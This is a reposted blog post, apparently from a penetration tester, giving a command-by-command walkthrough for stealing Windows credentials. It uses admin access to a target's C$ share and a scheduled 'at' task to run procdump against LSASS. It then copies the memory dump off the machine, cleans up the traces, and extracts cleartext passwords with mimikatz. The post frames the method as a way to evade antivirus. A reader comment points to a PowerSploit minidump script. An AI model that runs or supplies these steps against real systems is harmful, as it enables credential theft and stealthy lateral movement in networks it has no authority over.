Using mimikatz Alpha or getting clear text passwords with a Microsoft Tool

Source: Internet
Author: User
Tags net time

Mimikatz is now built into metasploit's meterpreter, you can doLoad mimikatzFrom the meterpreter prompt, but if you don't want to go through the hassystemic of dealing with AV, reverse or bind
Payloads, meterpreter binaries, And you have clear text credentials for an admin, you can just use mimikatz's alpha release that allows you to run mikatz on your machine against a process memory dump of LSASS. the great thing about this technique is that
The only thing on disk is a Microsoft tool.

Mimikatz minidump:

Http://blog.gentilkiwi.com/securite/mimikatz/minidump

Procdump:

Http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

Lets start. First we make sure our Authentication works against the box and we can look inside of C $ (usually only admins can)

net use \\TARGETBOX\C$ /user:DOMAIN\serviceaccount serviceaccount123dir \\TARGETBOX\C$

If that works then we want to check that we can all the "at" command on the remote host:

at \\TARGETBOX

All set. Next lets prep our workspace on the remote host. We are using the c: \ temp directory.

mkdir \\TARGETBOX\C$\Tempdir \\TARGETBOX\C$\Tempcopy c:\temp\procdump.exe \\TARGETBOX\C$\copy c:\temp\procdump.bat \\TARGETBOX\C$\

The contents of procdump. Bat are:

@echo offC:\temp\procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp

I'm using the computer name in the memory dump name to help me keep track of where the dump came from, but also help me notice when I 've dumped more than one IP that is actually the same host.

Next we schedule the task. UseNET TimeTo determine the local time for the remote machine.

net time \\TARGETBOXat \\TARGETBOX 13:52 C:\Temp\procdump.bat

Pull down the file and clean up:

dir \\TARGETBOX\C$\Tempcopy \\TARGETBOX\C$\Temp\*lsass.dmp C:\temp\output\rmdir /s \\TARGETBOX\C$\Temp

On your side the only thing you need to make sure is that you are running mimimikatz on a similar version and architecture you pulled from. Use the following URL for reference: http://blog.gentilkiwi.com/wp-content/uploads/2013/04/minidump_matrix.png

Load up the alpha version of mimikatz, switch it to minidump mode and you're dumping creds:

mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmpSwitch to MINIDUMPmimikatz # sekurlsa::logonPasswords full

 

Thats it. Password dumping without ever using a "hacker" tool on target. Much love Microsoft. And even more to mimikatz creator
@ Gentilkiwi-Benjamin Delpy for both this alpha release and changing his licensing to allow mikatz code to be integrated into meterpreter.

Rob
Fuller | 1
Comment | share article
Reader comments (1)

You can even create minidump via powershell script =)

Https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

Funny that the example given isLSASSProcess

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.